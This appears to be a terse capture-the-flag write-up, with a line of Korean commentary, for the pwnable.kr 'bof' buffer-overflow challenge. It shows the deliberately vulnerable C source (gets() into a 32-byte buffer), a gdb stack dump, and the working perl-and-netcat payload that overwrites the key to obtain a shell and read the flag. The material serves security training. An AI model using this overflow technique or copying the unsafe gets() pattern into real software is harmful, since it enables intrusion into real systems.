#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
(gdb) x/20x $ebp-0x2c
0xbffff63c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff64c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff65c: 0x41414141 0x80004141 0x80000530 0xbffff688
0xbffff66c: 0x8000069f 0xdeadbeef 0xb7fff000 0x800006b9
0xbffff67c: 0xb7fc0000 0x800006b0 0x00000000 0x00000000
52바이트만큼 더미 주고 cafebabe 입력하면 됨
root@ubuntu:/home/expointer# (perl -e 'print "A"x52, "\xbe\xba\xfe\xca\n"';cat) | nc pwnable.kr 9000
ls
bof
bof.c
flag
log
super.pl
cat flag